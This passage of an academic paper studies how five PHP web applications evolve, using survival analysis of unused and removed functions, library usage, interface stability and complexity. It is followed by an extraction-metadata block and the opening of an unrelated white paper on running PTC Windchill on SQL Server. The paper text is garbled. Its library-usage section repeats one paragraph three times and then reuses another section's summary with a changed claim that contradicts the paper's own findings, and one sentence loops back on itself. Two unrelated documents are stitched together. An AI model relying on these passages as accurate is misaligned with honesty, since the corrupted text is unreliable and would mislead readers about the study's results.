runs and imports the phpDCD tool to collect unused code data. Source code parsing and abstract syntax tree analysis follows excluding those that were marked as terminated in previous versions. Finally, unit tests are excluded from the survival analysis. Moreover, we make the assumption that all functions and methods can be characterized by the same survival function regardless of the time they were added to the project. In other words we assume that all functions can be characterized by the same probability of becoming unused. D. Survival regarding function removal In subsection III.C we presented our approach for analyzing the survival of functions and methods considering as termination event the time point at which they become unused. In this subsection we focus the survival analysis on the removal of functions. In other words, we consider as termination event the time point at which a function is removed from the system. The reason for performing the analysis at the function level (i.e. excluding class methods) is that the systems under study are mainly functional and their public API is mostly functional. Moreover, since PHP does not provide visibility modifiers to functions, the identification of the public API is not possible through source code analysis. Developers should consult the documentation in order to retrieve the subset of functions belonging to the public API. However, updates to the documentation are not performed systematically and as a result API documentation matching the official releases is not always reliable. Survival analysis regarding function removal enables us to obtain an insight into the evolution of the public API given that functions are by definition public. The mapping for estimating the survival function with respect to the removal of functions is similar. The discrete time points of observation \( t_i \) are the consecutive versions of the project under study. At each version, \( r_i \) represents the number of functions being at risk including the functions that survived from the previous version and the newly introduced ones. The termination event is defined as the removal of a function, meaning that the function signature is not defined in the project any more. Thus, \( d_i \) refers to the number of functions that are removed at version \( i \). E. Data collection and presentation software A software tool has been developed to automate the analysis. The tool has been implemented in PHP on top of the Symfony framework. It has a web interface in order to add projects for analysis and enable viewing of the results. The backend of the tool runs several steps in order to collect and analyze the projects. Initially it downloads from GitHub all versions of the project’s source code, runs pDepend to retrieve basic file information and elementary metrics. Then, it runs and imports the phpDCD tool to collect unused code data. Source code parsing and abstract syntax tree analysis follows to obtain function and method signatures. The aforementioned data are stored in a database for each version of the project. Using the stored data, the various analyses discussed in this study are performed. Results are accessible from the "public" section of the tool’s web interface. IV. RESULTS AND DISCUSSION A. Survival regarding function usage Kaplan-Meier curves illustrating the percentage of system functions surviving over successive software versions are shown in Figure 2 for all examined projects (the horizontal axis corresponds to the number of versions). ![Figure 2 Kaplan-Meier survival plots regarding function usage](http://pdepend.org/) As it can be observed, for Drupal and MantisBt, the vast majority of functions tend to remain used. For example, in \( 13 \) http://phpunit.de/ \( 14 \) http://symfony.com \( 15 \) http://pdepend.org/ \( 16 \) http://snf-451681.vm.okeanos.grnet.gr/ MantisBt, after 25 successive versions, almost 99% of the initial number of functions are still invoked by other functions in the project. For the other three systems, a non-negligible percentage of functions is gradually becoming unused. To provide further insight into the usage of functions and allow a mapping to the corresponding releases, we plot the survival function \( S(t) \) for each examined project in Figure 3. The horizontal axis represents the consecutive versions and the vertical axis the value of the survival function. The results for each project are examined separately along with a discussion of the major findings. In contrast to the previous Kaplan-Meier curves, in these plots containing staggered entries, we can also observe the impact of functions being introduced in one version and not being used thereafter. Moreover, library code is included in the analysis to investigate its effect. The plots for phpBB and Drupal share the same characteristics, since their survival function remains constant for a long time period and then exhibits a significant drop at a particular point of their evolution. For phpBB there is a large drop in version 3.0.0 and for Drupal in version 7.0. According to manual examination of their source code and their documentation, both projects underwent major changes in the corresponding version. Both projects extensively employed the notion of hooks, not only as an extension mechanism, but also for the implementation of the core functionality. Additionally, in these versions object-orientation literally invaded those projects. In the other three projects, in the versions where the survival function drops, after source code examination we found that employment of vendor libraries took place. For example, MantisBt uses ADOdb\(^{17}\) library, a widely used database layer, and in both cases (versions 1.1.0 and 1.2.0) there was an update of that library. Also in 1.1.0 the development team introduced a SOAP API to the application. For this reason the developers added the nuSoap\(^{18}\) library, a very widely used library implementing SOAP server and client protocols. In version 1.2.0 they also added the ezc\(^{19}\) library, a library of general purpose components. In WordPress according to the change log and blog entries announcing version 2.7, enhancements have been so important that it could be tagged as a major release, namely 3.0. Despite these major changes the drop in the value of the survival function in version 2.7 is rather small. In the next major version 2.8, the drop of the survival function is larger; however, according to the announcement blog entry the enhancements have been less important. The question that arises is why less important changes caused a larger change in the survival function. A closer look at the unused functions in version 2.8 provides further insight. The authors added the SimplePie\(^{20}\) library for RSS feed consumption. A building block has contributed to more than 50% of that version's unused code. Despite the major enhancements in version 2.7 no building blocks were added. This supports our conclusion that in web applications the key contributor to unused code are the used building blocks and that developers pay attention to keep the code clean from unused code. In scripting languages like PHP, using a third party library, implemented also in PHP, means that the library's code has to be added to the application's code. There is no binding of binaries as in the case of .jar files in Java. Unavoidably, using a proportion of the library's functionality leads the rest of the library code to remain unused. Along with phpBB and Drupal, WordPress also employs hooks as an extension mechanism to the public API, and additionally uses it to implement core functionality. Its API is also constantly growing due to the addition of stealth calls resulting in regular drops in the survival function. To summarize, four of the projects introduced code appearing as unused due to the implementation of hooks and three out of five, introduced a high percentage of unused code, due to the incorporation of third party libraries. Another point of interest is related to the versions where drops in the survival function appear. In general, drops in the survival function coincide with project's major versions. For example, in phpMyAdmin, all eleven drops of the survival curve coincide with the project's major versions. This implies the maintenance strategy that has been used. New code, thus new features, is added in major versions and in minor versions only bug fixing is performed. To illustrate this form of evolution, we tracked function additions in the sample. In Figure 3 we show the additions of functions/methods made in each version as a percentage of the number of total functions/methods that were employed in the previous version. A stalactite-stalagmite phenomenon is evident: new code is added in major versions, where the maintenance strategy that has been used. New code, thus new features, is added in major versions and in minor versions only bug fixing is performed. Finally, we calculated the survival separately for functions and class methods for MantisBt, PhpMyAdmin and WordPress. Methods exhibit higher drops (implying that --- \(^{17}\) http://adodb.sourceforge.net/ \(^{18}\) http://nusoap.sourceforge.net/ \(^{19}\) http://ezcomponents.org/ \(^{20}\) http://simplepie.org/ functions have a higher survival probability than methods) conforming to findings comparing C and C++ [18]. From the aforementioned observations it can be concluded that in the examined large-scale PHP projects a rather “rich” form of continuous maintenance is taking place involving the incorporation of external libraries and the addition of new code that takes advantages of the new libraries. In case scripting languages were not suitable for evolving software, these kinds of changes would be scarce and degrading over time, which is not the case in the examined systems. B. Survival regarding function removal The focus of the analysis now changes, as the terminating event is the removal of a function (rather than the ending of its usage). Kaplan-Meier survival plots are shown in Figure 4. In three out of the five projects a major drop can be observed at a particular point in their history, implying the removal of a large percentage of their functions. For Drupal and Wordpress the drops are rather regular and less abrupt. Figure 4 Kaplan-Meier survival plots regarding function removal As in the previous Section, to obtain a better insight into the corresponding phenomena, we show in Figure 5, plots of survival functions for all projects, including library code, as well as the percentage of added methods over the total number of functions of each project. The results will be discussed according to the pattern of the survival curve in relation to the method additions. MantisBt and phpBB exhibit the same pattern. There is one hotspot, where the survival function drops and a significant population of methods is added. The hotspot for MantisBt is version 1.2.0, and for phpBB version 3.0.0. After a manual inspection of the changes we found that, approximately 62% and 45% respectively, of the removed functions were replaced with class methods with the same functionality. For example, in MantisBt the developers moved wiki integration, upgrade module and graphs module into object oriented, enumeration functions to the ENUM class and part of the bug_api to the BugData class. In phpBB they moved the bbcode parser, session handling and search functions into classes. The remaining removals are due to functionality modifications and architectural changes. For example, in phpBB, the database upgrade module was entirely rewritten resulting in the removal of numerous functions. Figure 5. Survival functions regarding function removal and method additions. Left vertical axis represents the value of the survival function, right vertical axis represents the percentage of method additions and horizontal axis the consecutive versions. PhpMyAdmin, WordPress and Drupal do not exhibit a single hotspot but function removals are distributed over almost all major releases. Concentrated additions of class methods in major releases occurred only in PhpMyAdmin and Wordpress. As already mentioned, Drupal adopted object orientation in version 7.0 and since that version only a limited number of classes have been added while no functions have been removed thereafter. So in Drupal only internal functionality improvements via function rewrites is the source of function removals in all versions, but version 7.0. In that version, their database layer was completely replaced by a new object oriented database layer, substituting 70 functions with over 450 class methods. Despite the continuous additions of class methods in Wordpress, after manual inspection we found that in version 2.8 there was a migration to object orientation, where the majority of the removed functions have been replaced with class methods that have the same functionality. As in Drupal, in the rest of the cases where function removal is high, the reason is the rewriting of the same functionality employing the procedural paradigm. In phpMyAdmin there are two versions with a higher change in the survival function, versions 4.0.0 and 4.1.0, indicating that major changes took place. A manual review of the source code confirmed our speculation. In version 4.0.0 267 functions have been removed, of which 76% were moved to classes. For example, the transformations module, auth module and export module were rewritten as object oriented plug-ins. A set of utility functions (common.lib.php) were packed to a class (Util.class.php) and similarly a set of functions used to display query results were packed to a class (DisplayResults.class.php). In version 4.1.0 rewriting in the same manner took place. Functions in the same context were packed to classes, as for example, validation functions which were moved to a Validator class and database interface functions which were moved to the DatabaseInterface class. Finally, a large set of functions implementing the dbi (DataBaseInterface) library have been refactored to classes. Cumulatively, 77% of the removed functions migrated to classes. An observation made during the inspection of the source code is that a number of functions reported as removed were renamed due to the change of coding standards. The initial naming convention for function names was that names should be snake case following PHP's conventions, but the late trend, as also proposed in PSR-1 standard, in PHP is camel case, so the developers changed the project's coding standard applying camel case to function and method names. To summarize, three of the five projects are gradually migrating their functions to class methods, and thus function removal is justified by this fact. The other two projects, Drupal and Wordpress, are employing object orientation for the implementation of new features and removed functions are replaced with new function implementations. One possible interpretation is the plethora of user contributed plug-ins and themes to Drupal and Wordpress and as a result, breaking compatibility is not an option. At the time of writing, Wordpress' download site contained almost 30,000 plug-ins and more than 2,000 themes. For Drupal, there are more than 8,000 modules and almost 600 themes. Most of them are user contributed and distributed under an open source license. C. Library usage PHP is a rather new programming language and according to TIOBE has gained popularity during the last decade. An indirect indication of maturity for a given programming language is the development of third party libraries and the employment of them in other projects. In three out of the five projects in our study we have observed a strong trend in using such libraries. As Tulach [19] observes, the trend in modern software development is the use of such pre-made building blocks in order to ease and speed up the development of applications. As we have shown, a side effect is the introduction of unused code blocks, due to the scripting nature of the language. However, the fact that the library's source code becomes part of the system's source code, enables us to measure the ratio of library code over system code, something that is not straightforward with compiled languages. In Figure 6 the plots show the used library code over the system code of each application (please note that the y-axis range is not the same across all projects). PhpBB and Drupal appear to employ a limited portion of third party libraries and the employment of them in other projects. In three out of the five projects in our study we have observed a strong trend in using such libraries. As Tulach [19] observes, the trend in modern software development is the use of such pre-made building blocks in order to ease and speed up the development of applications. As we have shown, a side effect is the introduction of unused code blocks, due to the scripting nature of the language. However, the fact that the library's source code becomes part of the system's source code, enables us to measure the ratio of library code over system code, something that is not straightforward with compiled languages. In Figure 6 the plots show the used library code over the system code of each application (please note that the y-axis range is not the same across all projects). PhpBB and Drupal appear to employ a limited portion of third party libraries and the employment of them in other projects. In three out of the five projects in our study we have observed a strong trend in using such libraries. As Tulach [19] observes, the trend in modern software development is the use of such pre-made building blocks in order to ease and speed up the development of applications. As we have shown, a side effect is the introduction of unused code blocks, due to the scripting nature of the language. However, the fact that the library's source code becomes part of the system's source code, enables us to measure the ratio of library code over system code, something that is not straightforward with compiled languages. To summarize, three of the five projects are gradually replacing any third party libraries with in-house code. The other two projects, Drupal and Wordpress, are employing object orientation for the implementation of new features and removed functions are replaced with new function implementations. One possible interpretation is the plethora of user contributed plug-ins and themes to Drupal and Wordpress and as a result, breaking compatibility is not an option. At the time of writing, Wordpress' download site contained almost 30,000 plug-ins and more than 2,000 themes. For Drupal, there are more than 8,000 modules and almost 600 themes. Most of them are user contributed and distributed under an open source license. D. Interface stability The stability of an interface can be characterized by the number and types of changes to the functions' signatures. According to the strict PHP definition, a function signature is only the name of the function, but this does not reflect the interface correctness, since no parameters are included. To track interface changes in more detail, we have also considered the mandatory and optional function parameters as well as the default values of the optional parameters. We classified the possible changes to six categories as shown in Table III. For each version of the examined systems we have computed the ratio of changes over the total number of signatures, differentiating between the six cases shown in Table III. Next, we computed the mean of all versions for each project and the results are summarized in Table IV. The values for cases C1 to C5 are extremely low, considering the almost ten years of evolution for each project. This fact implies that development teams have paid attention in order not to break backward compatibility and that the corresponding APIs are mature. Changes of the 6th type exhibit a mean ranging from 25% to 40%. --- 22 http://www.php-fig.org/psr/psr-1/ 23 http://en.wikipedia.org/wiki/CamelCase 24 http://www.tiobe.com/index.php/content/paperinfo/tpci/PHP.html 25 https://phpexcel.codeplex.com/ 3.75% for phpMyAdmin, to 14.22% for phpBB, providing further support to the aforementioned claim, since despite the implementation changes for a number of functions, the corresponding signatures remained stable. <table> <thead> <tr> <th>Category</th> <th>Impact</th> <th>Severity</th> </tr> </thead> <tbody> <tr> <td>C1</td> <td>Change of mandatory parameters</td> <td>Breaking function's compatibility, i.e. client has to refactor function invocation</td> </tr> <tr> <td>C2</td> <td>Addition of optional parameters</td> <td>Possible extension of function's functionality or enhanced detail in their results. No impact on compatibility, i.e. existing clients do not have to be adapted</td> </tr> <tr> <td>C3</td> <td>Removal of optional parameters</td> <td>Possible breaking of function's compatibility; issues to calls that used the removed optional parameters</td> </tr> <tr> <td>C4</td> <td>Change of default values</td> <td>Possible breaking of function's compatibility; issues to calls that used the default values</td> </tr> <tr> <td>C5</td> <td>Change of function's return type (identified by PHP annotations)</td> <td>Possible breaking of function's compatibility; issues to calls that expect different return type</td> </tr> <tr> <td>C6</td> <td>Change of function's implementation</td> <td>No impact on interface compatibility but a factor that shows interface stability since developers pay attention when evolving a function to keep their interface intact</td> </tr> </tbody> </table> **TABLE IV. RATIO OF CHANGES IN FUNCTION SIGNATURES** <table> <thead> <tr> <th>Project</th> <th>C1 (%)</th> <th>C2 (%)</th> <th>C3 (%)</th> <th>C4 (%)</th> <th>C5 (%)</th> <th>C6 (%)</th> </tr> </thead> <tbody> <tr> <td>Drupal</td> <td>0.15</td> <td>0.08</td> <td>0.03</td> <td>0.09</td> <td>0.16</td> <td>6.02</td> </tr> <tr> <td>WordPress</td> <td>0.06</td> <td>0.16</td> <td>0.03</td> <td>0.27</td> <td>0.42</td> <td>8.70</td> </tr> <tr> <td>phpBB</td> <td>0.14</td> <td>0.35</td> <td>0.02</td> <td>3.19</td> <td>0.97</td> <td>14.22</td> </tr> <tr> <td>MantisBi</td> <td>0.04</td> <td>0.11</td> <td>0.00</td> <td>0.46</td> <td>0.50</td> <td>6.65</td> </tr> <tr> <td>phpMyAdmin</td> <td>0.09</td> <td>0.09</td> <td>0.02</td> <td>0.70</td> <td>1.26</td> <td>3.75</td> </tr> </tbody> </table> **E. Classes invasion** Object orientation in PHP was fully supported in version 5.3, but it was partially supported and used few years before that, starting in early 4.x versions. So there was a period where procedural systems could migrate code to classes. In Figure 7 we present the ratio of the number of methods over the total number of functions and methods belonging to each range. The percentages over time are almost constant for all five projects as shown in Figure 8. **Figure 7 Methods ratio over total number of functions and methods** Our conclusion is that migrating applications from procedural to the object oriented paradigm is not only a matter of developers' will or implementation language, but if the project can afford the cost of breaking backward compatibility imposing significant issues to their clients. **F. Evolution of Complexity** To complement our study with a rather traditional measure, we computed McCabe's cyclomatic complexity (CCN), thereby investigating if PHP practitioners implement comprehensible and thus maintainable code. We calculated CCN per function and then obtained the average CCN of all functions for each version. To make results more readable we categorized the functions according to their CCN in three ranges. A value of 10 is usually considered as a critical threshold [3], [4]. To enable a more fine-grained classification and to comply with critical levels identified by various quality assessment tools, we considered a second threshold at the value of 5. As a result, values in the range [0..5) imply excellent readability, [5-10) medium complexity but still readable code and values higher than 10, code that should be examined closely. Next, we calculated the percentage of functions belonging to each range. The percentages over time are almost constant for all five projects as shown in Figure 8. **Figure 8 Evolution of functions in three complexity ranges over time** The percentage of functions in the high complexity class remains almost the same across all versions and is relatively low, suggesting that new code added to the projects does not contribute to quality degradation. The resulting conclusion regarding this aspect of software quality, is that the examined projects are developed properly leading to maintainable code. G. Overview of findings To facilitate the interpretation of the results, an overview of the investigated phenomena, the employed unit of analysis and the conclusions derived based on the findings for each project is provided in Table V. A ‘✔’ marking implies that the derived conclusion can be considered as validated for the corresponding project, while a ‘×’ mark implies that the conclusion is not validated. (‘N/A’ for the claim that classes introduce more unused code than functions has been used for two projects that had a very limited number of classes). V. Threats to Validity As already mentioned, one important threat to the construct validity of our study is the presence of stealth calls, i.e. functions/methods which are identified as unused, despite the fact that there are actually invocations on them. According to Wohlin et al. [20], construct validity reflects the extent by which the phenomenon under study really represents what is investigated. Although it is not possible to estimate the extent of stealth calls in the examined systems, this threat is partially mitigated since the analysis is evolutionary and thus changes in the observed phenomena and trends are relative, partially factoring out the effect of unidentified function invocations. Another threat of the same type pertaining to the applied survival analysis is related to the consideration that once functions become unused they remain unused for the rest of the evolution. Obviously, one function might become unused and then be invoked again in a subsequent version or even might become unused in the future again and so on. This threat is mitigated by the choice to consider the survival function rather than the cumulative survival estimator which would over-stress the impact of unused functions. Since the analysis is based on results from 5 web applications, threats to external validity are present limiting the ability to generalize our findings. Moreover, the fact that the examined applications are large, widely known and heavily used applications, implies that the development practices in these projects might differ from other, less professionally developed systems. However, since the goal was to investigate whether development with scripting languages can comply with the proper practices laid out by software engineering, the authors believe that the examined systems are representative of multi-version, multi-person projects in Web applications addressing the needs of a vast community of clients. VI. Related Work Software evolution is one of the most studied areas in software engineering originating to the 1970’s when M. Lehman laid down the first principles of software evolution [7] which gradually evolved to eight laws. The validity of Lehman’s laws in various contexts has been studied by several researchers. Recently, Xie et al. [21] studied the software evolution of seven open source projects implemented in C. <table> <thead> <tr> <th>Phenomenon</th> <th>Unit of Analysis</th> <th>Conclusion</th> <th>validation on Projects</th> </tr> </thead> <tbody> <tr> <td>A. Survival regarding function usage</td> <td>Survival function (term. event fan-in=0)</td> <td>The main source of unused code is library usage.</td> <td>✔ ✓ × ✔ ✓</td> </tr> <tr> <td>B. Survival regarding function removal</td> <td>Survival function (term. event function deletion)</td> <td>Function removal appears in major versions</td> <td>✔ ✔ ✔ ✔</td> </tr> <tr> <td>C. Library usage</td> <td>Percentage of library source code over project's own code</td> <td>Projects reuse code incorporating third party libraries</td> <td>✔ ✔ × ✔</td> </tr> <tr> <td>D. Interface stability</td> <td>Percentage of functions in each change category</td> <td>Function interface remains stable</td> <td>✔ ✔ ✔ ✔</td> </tr> <tr> <td>E. Classes invasion</td> <td>Percentage of class code over total source code</td> <td>Projects gradually migrate to OO paradigm</td> <td>✔ ✔ ✔ ✔</td> </tr> <tr> <td>F. Evolution of Complexity</td> <td>Percentage of modules in each complexity category</td> <td>Complexity remains stable</td> <td>✔ ✔ ✔ ✔</td> </tr> </tbody> </table> Conclusion: The examined PHP applications undergo systematic maintenance McCabe’s CCN and LOC were used to investigate the validity of the second and the sixth law, respectively. Both laws have been validated. The findings for PHP projects are in agreement to these conclusions for C projects. Survival analysis to estimate aspects of software projects has been employed by Sentas et al. [17] as a tool to predict the duration of software projects. In a similar manner, Samoladas et al. [15] employed the Kaplan-Meier estimator to predict the duration of open source projects. Scanniello [16] applied the Kaplan-Meier estimator on Java open source projects, to study the effect of dead code in the evolution of projects. The results show that high rates of unused code are detected in most of the projects in that study. Regarding the use of libraries, Heinemann et al. [5] studied the extent of software reuse in Java open source software. The authors made a distinction between black box and white box usage which does not apply to scripting languages and in order to quantify the extent of reuse they measured byte code of jar files used. They showed that in most cases over 50% of the code size has its source in third party libraries. Mockus [11] investigated large-scale code reuse in open source projects by identifying components that are reused among several projects. However, Mockus’ work quantifies how often code entities are reused, rather than the actual third party code. Based on their results, code reuse is a common practice in open source projects, a fact which is confirmed by the findings in our study. VII. CONCLUSIONS Scripting languages and PHP in particular form the cornerstone of an increasing number of widely acknowledged and heavily used web applications. Five such projects have been analyzed in this paper in an attempt to investigate the maintenance habits followed by open-source developers relying on PHP. Several aspects of software evolution have been investigated, including the presence of unused code, the removal of functions, the use of third-party libraries, the API stability, complexity as well as the migration to the object-oriented paradigm. The results are conclusive: The examined PHP projects undergo systematic maintenance driven by targeted design decisions and PHP does not seem to hinder the adaptive and perfective maintenance activities. In particular, projects rely on the use of third-party libraries which in turn introduce unused code. All systems gradually migrate to the object-oriented paradigm. Migration to object-orientation in three of the five projects is performed by replacing functions with objects, while for two projects only new features are implemented with classes. The interface of functions remains strictly stable avoiding compatibility problems with existing clients. Finally, the complexity of the projects appears to remain stable, in terms of the percentage of system modules in distinct complexity levels. All of these findings suggest that maintenance is performed with care and in a well-organized manner for the examined PHP applications and significant lessons can be learned from their evolution history.
{"Source-Url": "http://users.uom.gr/~achat/papers/ICSME2014.pdf", "len_cl100k_base": 10469, "olmocr-version": "0.1.50", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 33039, "total-output-tokens": 10713, "length": "2e13", "weborganizer": {"__label__adult": 0.00037479400634765625, "__label__art_design": 0.00023114681243896484, "__label__crime_law": 0.000270843505859375, "__label__education_jobs": 0.0006995201110839844, "__label__entertainment": 4.9173831939697266e-05, "__label__fashion_beauty": 0.0001245737075805664, "__label__finance_business": 0.0001659393310546875, "__label__food_dining": 0.0002560615539550781, "__label__games": 0.0004062652587890625, "__label__hardware": 0.0005674362182617188, "__label__health": 0.0003407001495361328, "__label__history": 0.00016677379608154297, "__label__home_hobbies": 5.704164505004883e-05, "__label__industrial": 0.00019049644470214844, "__label__literature": 0.00020110607147216797, "__label__politics": 0.000164031982421875, "__label__religion": 0.00030493736267089844, "__label__science_tech": 0.0034770965576171875, "__label__social_life": 7.43865966796875e-05, "__label__software": 0.004360198974609375, "__label__software_dev": 0.98681640625, "__label__sports_fitness": 0.00019729137420654297, "__label__transportation": 0.0002658367156982422, "__label__travel": 0.00015103816986083984}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 49107, 0.03126]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 49107, 0.46222]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 49107, 0.92608]], "google_gemma-3-12b-it_contains_pii": [[0, 4900, false], [4900, 10675, null], [10675, 15709, null], [15709, 21425, null], [21425, 26871, null], [26871, 31770, null], [31770, 37839, null], [37839, 41634, null], [41634, 45979, null], [45979, 49107, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4900, true], [4900, 10675, null], [10675, 15709, null], [15709, 21425, null], [21425, 26871, null], [26871, 31770, null], [31770, 37839, null], [37839, 41634, null], [41634, 45979, null], [45979, 49107, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 49107, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 49107, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 49107, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 49107, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 49107, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 49107, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 49107, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 49107, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 49107, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 49107, null]], "pdf_page_numbers": [[0, 4900, 1], [4900, 10675, 2], [10675, 15709, 3], [15709, 21425, 4], [21425, 26871, 5], [26871, 31770, 6], [31770, 37839, 7], [37839, 41634, 8], [41634, 45979, 9], [45979, 49107, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 49107, 0.18227]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
f6ed6dd95f6f094892b679bc7134502ca8d8a4fa
Best Practices for PTC Windchill on Microsoft SQL Server Production-proven content and process management software Microsoft Corporation Published: May 2010 Author: Ken Lassesen Reviewers: Tim Atwood (PTC), Victor Gerdes (PTC), Richard Waymire (Solid Quality Mentors) Abstract PTC Windchill is the only Product Lifecycle Management (PLM) solution designed from the ground up to work in an Internet-based, distributed-design environment. Whether you need core product data-management capabilities, optimization of processes to meet industry-specific requirements, or support for global product development, Windchill has the capabilities you need for effective management of global product development teams. Microsoft® SQL Server® provides an ideal database platform for Windchill. With SQL Server as a foundation, Windchill can further reduce the time and costs related to managing product development. This white paper provides best practices for configuring and running Windchill on the SQL Server database platform. The information in this paper complements the detailed support documentation provided on the PTC support Web site. Implementing these best practices can help you avoid or minimize common problems and optimize the performance of Windchill on SQL Server so that you can effectively manage your resources, reduce operating expenses, increase productivity, and improve employee satisfaction. Copyright Information The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information presented after the date of publication. This white paper is for informational purposes only. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED, OR STATUTORY, AS TO THE INFORMATION IN THIS DOCUMENT. Complying with all applicable copyright laws is the responsibility of the user. Without limiting the rights under copyright, no part of this document may be reproduced, stored in, or introduced into a retrieval system, or transmitted in any form or by any means (electronic, mechanical, photocopying, recording, or otherwise), or for any purpose, without the express written permission of Microsoft Corporation. Microsoft may have patents, patent applications, trademarks, copyrights, or other intellectual property rights covering subject matter in this document. Except as expressly provided in any written license agreement from Microsoft, the furnishing of this document does not give you any license to these patents, trademarks, copyrights, or other intellectual property. © 2010 Microsoft Corporation. All rights reserved. Microsoft, SQL Server, Hyper-V, MSDN, and Windows are trademarks of the Microsoft group of companies. All other trademarks are property of their respective owners. # Table of Contents **OVERVIEW** ......................................................................................................................... 5 - **INTRODUCING PTC WINDCHILL: A COMPLETE SOLUTION FOR PLM** .......................................................... 5 - **SQL SERVER: AN ENTERPRISE-READY DATABASE PLATFORM FOR WINDCHILL** ........................................ 6 - **PTC AND MICROSOFT: A HISTORY OF INNOVATION** ...................................................................................... 6 - **BETTER TOGETHER: WINDCHILL ON THE SQL SERVER DATABASE PLATFORM** ........................................... 6 **BEST PRACTICES FOR INSTALLING WINDCHILL ON SQL SERVER** ......................................................... 7 - **SELECT, SIZE, AND CONFIGURE SQL SERVER FOR OPTIMAL PERFORMANCE** ........................................ 7 - **Hardware Selection** .......................................................................................................................... 8 - **Configuring Tempdb** ..................................................................................................................... 9 - **Instant File Initialization** ................................................................................................................ 12 - **Using Tempdb in Memory** .............................................................................................................. 12 - **MEMORY AND CPU** ......................................................................................................................... 13 - **ADDITIONAL PERFORMANCE ANALYSIS WITH DMVs** ........................................................................... 15 - **LOCKED PAGES** ............................................................................................................................... 16 - **LOCK ESCALATION** .......................................................................................................................... 16 **DATABASE FILES** ...................................................................................................................... 16 - **RAID DRIVE ARRAYS** ...................................................................................................................... 17 - **SAN DRIVES** ................................................................................................................................... 17 - **RECOVERY MODEL** .......................................................................................................................... 18 - **Cost of Recovering Instead of Using Hot-Swapped Mirror Drives** .................................................... 18 - **DISK DRIVE SUBSYSTEMS** ............................................................................................................. 18 - **WINDCHILL LOGICAL FILES** .......................................................................................................... 19 **INDEX TUNING** ............................................................................................................................... 21 - **WHAT IS A FILL FACTOR?** ............................................................................................................... 21 - **EVALUATING INDEX FRAGMENTATION** ............................................................................................ 23 - **TYPES OF INDEXES** ......................................................................................................................... 25 - **MISSING INDEXES** ............................................................................................................................ 25 - **TOOLS TO HELP MAINTAIN SQL SERVER PERFORMANCE** .............................................................. 26 - **CAPACITY PLANNING AND MONITORING** .................................................................................... 26 - **Common DBCC Commands** ........................................................................................................ 27 - **COMMON MISTAKES** ...................................................................................................................... 28 **CONCLUSION** ............................................................................................................................... 28 **LINKS FOR FURTHER INFORMATION** ............................................................................................ 29 - **BIBLIOGRAPHY** .............................................................................................................................. 31 **APPENDIX: HARDWARE SIZING GUIDE FOR WINDCHILL 9.1 AND SQL SERVER 2005** ......................... 32 FIGURES Figure 1 - Example of a 4-core Tempdb Configuration ............................................................ 11 Figure 2 - Example of Possible I/O Bottleneck on the Log File ......................................................... 15 Figure 3 - Windchill Database Files Dialog Box Showing Autogrowth .............................................. 21 Figure 4 - Rate of Growth Over Time with Constant Rate of New Records ........................................... 22 Figure 5 - Example of Retrieving Index Fragmentation Statistics ....................................................... 24 Figure 6 - Reviewing DBCC USEROPTIONS .............................................................................. 28 TABLES Table 1 - Assigning Components by Disk Performance ........................................................................ 9 Table 2 - Recommended Values for Tempdb Database Options .......................................................... 11 Table 3 - Performance Monitor Indicators of Inadequate Resources .................................................... 14 Table 4 - RAID Types ....................................................................................................................... 17 Table 5 - SAN Setting ........................................................................................................................ 17 Table 6 - Frequency of Backups by Installation Size ............................................................................. 18 Table 7 - Ranked Performance of Different Disk Drive Subsystems .................................................... 19 Table 8 - Windchill Logical Files ........................................................................................................ 20 Table 9 - Example of Logical Drive Assignments ............................................................................. 21 Table 10 - Calculating Fill Factor from Historical Data ...................................................................... 22 Table 11 - Fill Factors by Index Key Size for 2% Growth .................................................................. 25 Table A - Database Server Sizing for Windchill 9.0 and 9.1 .............................................................. 33 Table B - Number of Physical Files in the Tempdb Filegroup ............................................................... 34 Overview For manufacturers, there is constant pressure today to compete in rapidly changing markets. Companies must be innovative in keeping costs low while maintaining high-quality results. The stakeholders involved in the product development process have also changed. Teams today extend far beyond the central engineering department to include globally dispersed cross-functional groups working on hundreds of products with thousands of parts. The result is an enormous amount of data. To stay ahead of the global competition, companies find that they must create a collaborative environment that brings together engineering, manufacturing, marketing, and sales teams. Product Lifecycle Management (PLM) solutions can help manufacturers achieve this collaboration, while also streamlining operations and keeping costs down. PLM is the process of managing all phases of product development—from initial concept through end of life. Effective PLM combines information, methodology, and available resources for each phase of a product’s lifecycle, improving a manufacturer’s ability to respond swiftly and effectively to changes, new markets, and competitors. Introducing PTC Windchill: A Complete Solution for PLM PTC Windchill provides a complete family of solutions for content and process management, helping manufacturers efficiently control all information assets related to product development while optimizing associated business processes. Windchill is the only PLM solution designed from the ground up to work in an Internet-based, distributed-design environment. Windchill technology forms a solid foundation for a variety of packages that PTC offers to address data, change, configuration, and process management; product development collaboration; project management and execution; and the release of product information to manufacturing management systems. For example, - **Windchill PDMLink** consolidates scattered islands of product content into a single information source, which can help bring order to chaotic product development processes such as change management and speed the development of new product configurations. - **Windchill ProjectLink** creates a virtual workspace that becomes the central access point for a project, enabling team members to collaborate with access to the same information. By automating project management 